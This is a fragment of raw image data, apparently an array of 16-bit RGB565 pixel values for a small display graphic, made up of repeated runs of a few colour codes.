0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 